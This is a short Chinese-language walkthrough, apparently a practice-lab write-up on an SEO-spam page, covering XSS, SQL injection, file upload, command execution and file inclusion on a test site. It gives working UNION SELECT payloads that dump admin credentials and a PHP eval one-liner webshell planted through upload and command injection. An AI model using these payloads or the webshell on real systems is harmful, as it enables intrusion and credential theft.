当前位置: 首页 > wzjs >正文

黑龙江省机场建设集团官网网站seo优化怎么做

黑龙江省机场建设集团官网网站,seo优化怎么做,手机微网站建设案例及报告,课件ppt模板免费下载网站寻找漏洞 一,我们打开页面 第一个漏洞 xss漏洞 1.在登录页面显示有弹窗 第二个漏洞 sql注入漏洞 1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点 2.查看数据库表名 -1 union select 1,database(),3# 3.查看表名 -1 union select 1,2,group…

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

http://www.dtcms.com/wzjs/216208.html

相关文章:

  • 郑州哪家公司给国外做网站免费网站安全软件大全
  • 如何引用网站上的资料做文献网络推广怎么做好
  • 可以做网站开个写手公司自助建站系统下载
  • 关于服装的网站规划与设计免费发布产品的网站
  • 平湖网站制作济南seo优化公司助力网站腾飞
  • 重庆本地网站有哪些百度搜索官网
  • 做效果图的兼职网站广告联盟平台入口
  • 做网站背景步骤综合搜索引擎
  • ico在线制作网站齐三seo顾问
  • 测试网站免费空间网站seo排名优化价格
  • 锦州网站做优化优化排名案例
  • 建网站能赚钱吗网络推广员怎么做
  • 百度网站地图制作百度网络营销的概念
  • 北京海淀区网站建设抖音seo优化怎么做
  • 以网站做跳板入侵营销咨询公司经营范围
  • 不用网站做淘宝客百度推广费用多少钱
  • 广告公司网站策划苏州seo服务热线
  • 温州网站开发平台百度站长工具添加不了站点
  • h5效果展示网站如何提高自己在百度的排名
  • 中山网站建设公司哪个好aso推广平台
  • 佛山网站建设怎样做浏览器网址
  • 网站用户引导seo自媒体培训
  • 如何做介绍一门课程的网站客户关系管理
  • 交互式网站开发技术上海推广服务
  • 怎样做企业营销网站电商网站对比表格
  • 网站开发项目有哪些html网页制作网站
  • 国家建设部网站华为云速建站
  • 深圳南山网站建设站长工具whois查询
  • 中美军事最新消息汕头网站快速优化排名
  • PHP+MySQL网站开发全程实例搜索引擎营销的步骤